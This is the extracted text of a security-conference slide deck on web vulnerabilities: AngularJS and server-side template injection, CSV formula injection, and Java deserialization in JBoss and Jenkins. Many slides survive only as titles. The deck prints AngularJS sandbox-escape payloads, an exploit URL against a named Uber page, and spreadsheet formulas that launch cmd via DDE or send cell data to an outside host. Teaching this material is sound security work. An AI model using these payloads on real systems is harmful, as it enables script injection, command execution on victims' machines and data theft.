1) The document discusses several vulnerabilities in modern web applications including AngularJS template injection, server-side template injection in frameworks like Smarty and Twig, CSV injection, and Java object deserialization vulnerabilities. 2) It provides details on detecting and exploiting these vulnerabilities with examples of payloads and real-world cases that have been discovered. 3) The document includes demonstrations of exploiting template injection in Piwik and AngularJS, server-side template injection in Flask and Alfresco, and Java deserialization in applications like JBoss and Jenkins.

1. Some new vulnerabilities in
modern web application (Part 1)
hkln1 (@anh_npt)

2. Xin cảm ơn các nhà tài trợ

3. AngularJS Template Injection (Client-site
template injection)

4. What is AngularJS ?
• Popular MVC JavaScript Framework
• Maintained and recommended by Google
• Read more:
• https://docs.angularjs.org/tutorial

5. What’s risk ? (1)
Not vulnerable

6. What’s risk ? (2)
???

7. Four general attack vectors
1. Attacking the Sandbox
2. Attacking the Sanitizer
3. Attacking the CSP Mode
4. Attacking the Codebase

8. The payloads…
• 1.0.1 - 1.1.5
• {{constructor.constructor('alert(1)')()}}
• 1.2.0 - 1.2.1
• {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getP
rototypeOf(a.sub),a).value,0,'alert(1)')()}}
• ….
• 1.4.0 - 1.4.9
• {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
• 1.5.0-rc2  Fixed

9. AngularJS injection in the wild (1)
• https://hackerone.com/reports/125027

10. AngularJS injection in the wild (2)
• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}
• Response: wrtz49  Vulnerable
• Exploit: https://developer.uber.com/docs/deep-
linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnProper
tyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz

11. Demo
• Piwik

12. Reference
• http://blog.portswigger.net/2016/01/xss-without-html-client-side-
template.html
• http://www.slideshare.net/x00mario/an-abusive-relationship-with-
angularjs

13. Server-site template injection

14. What is template engine? (1)
• Present dynamic data via web pages and emails.
• Separation of presentation (HTML/CSS) from application logic.
• Used in wikis, blogs, marketing applications and CMS.
• Some template engines:
• FreeMarker
• Velocity
• Smarty
• Twig
• Jade

15. What is template engine? (2)
<?php echo $param ?>
<?php echo htmlspecialchars($var, ENT_QUOTES, ‘UTF-8’) ?>
{{ param }}
{{ param | escape}} / {{ param | e}}

16. What’s risk ?
• Not only XSS  Remote Code Execution (RCE)
• Arbitrary object creation
• Arbitrary file read/write
• Remote file include
• Information disclosure and privilege escalation

17. Introduction (1)
• $output = $twig->render("Dear {first_name},", array("first_name" =>
$user.first_name) );  Not vulnerable
• $output = $twig->render($_GET['custom_email'], array("first_name"
=> $user.first_name) );  ???

18. Introduction (2)
• custom_email={{7*7}}  49
• custom_email={{self}}  Object of class
__TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78d
b3538221c1145580ca4a5 could not be converted to string

19. Template injection methodology

20. Detect (1)
• Plaintext context
smarty= Hello {user.name}
Hello user1
freemarker= Hello ${username}
Hello user1
any= <b> Hello </b>
<b> Hello </b>
smarty= Hello ${7*7}
Hello 49
freemarker= Hello ${7*7}
Hello 49

21. Detect (2)
• Code context
Personal_greeting = username
Hello user1
Personal_greeting = username<tag>
Hello
Personal_greeting = username }} <tag>
Hello user01 <tag>

22. Identify

23. Exploit
• ‘For Template Authors’ - sections covering basic syntax.
• ‘Security Considerations’ - chances are whoever developed the app
you're testing didn't read this, and it may contain some useful hints.
• Lists of builtin methods, functions, filters, and variables.
• Lists of extensions/plugins - some may be enabled by default.

24. Payloads: Smarty (1)

25. Payloads: Smarty (2)

26. Payloads: Smarty (3)

27. Payloads: Smarty (4)

28. Payloads: Twig

29. Payloads: Twig (Sandboxed)

30. Payloads: Jade

31. Payloads: FreeMarker

32. Server-side template injection in the wild
• https://hackerone.com/reports/125980

33. Demo
• Flask/Jinja2
• Alfresco

34. Reference
• http://blog.portswigger.net/2015/08/server-side-template-
injection.html
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
• https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-
part-ii
•

35. Fomular Injection (CSV Injection)

36. What is CSV Injection ?
• Exploit via the export functionality that allow user to download CSV
(Excel) file.
• Often contain input from untrusted sources such as survey responses,
transaction details, and user-supplied addresses, …
• The attacker can execute any commands on user machine if web
application does not properly validate the contents of the CSV file.

37. How to test?
• =1 + 1  2
• -2 + 3  1
• +3 + 5  8

38. The payloads…
• =HYPERLINK(https://example.com?test=&A1&A2,”Error: please click
for further information”)
• =DDE(“cmd”;”/C calc”; “DdeLink_60_870516294”)
• =cmd | ‘ /C calc ‘ !A0

39. CSV Injection in the wild

40. Demo
• Mangento Community

41. Reference
• https://www.owasp.org/index.php/CSV_Excel_Macro_Injection
• https://hackerone.com/reports/72785
• http://www.contextis.com/resources/blog/comma-separated-
vulnerabilities/

42. Java deserialization vulnerability

43. What is serialization ?

44. What is serialization ? (2)

45. More complex serialization… (1)

46. More complex serialization… (2)

47. Serialization in the context of Java web
applications and application servers
• In HTTP requests – Parameters, ViewState, Cookies
• RMI – The extensively used Java RMI protocol
• RMI over HTTP – Many Java thick client web apps use this
• JMX
• Custom Protocols

48. What’s problems ?
• What if we knew of an object that implemented a “readObject”
method that did something dangerous ?
• What if instead of appending an exclamation point to a user defined
string ?

49. How to identify wherever an application
might be vulnerable ?

50. Java deserialization vulnerability in the wild
• http://artsploit.blogspot.com/2016/01/paypal-rce.html

51. Analysis of exploiting the real cases – Jboss
application (1)
1. Identify

52. Analysis of exploiting the real cases – Jboss
application (2)
1. Exploit

53. Demo

54. Analysis of exploiting the real cases – Jenkins
application (1)
1. Vulnerability Detection

55. Analysis of exploiting the real cases – Jenkins
application (2)
1. Vulnerability Detection

56. Analysis of exploiting the real cases – Jenkins
application (3)
1. Vulnerability Detection

57. Analysis of exploiting the real cases – Jenkins
application (3)
2. Exploit Development

58. Analysis of exploiting the real cases – Jenkins
application (3)
2. Exploit Development

59. Analysis of exploiting the real cases – Jenkins
application (3)
2. Exploit Development

60. Analysis of exploiting the real cases – Jenkins
application (4)
2. Exploit Development

61. Analysis of exploiting the real cases – Jenkins
application (5)
2. Exploit Development

62. Demo

63. Reference
• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-
websphere-jboss-jenkins-opennms-and-your-application-have-in-
common-this-vulnerability/
• http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-
pickles
• https://www.youtube.com/watch?v=VviY3O-euVQ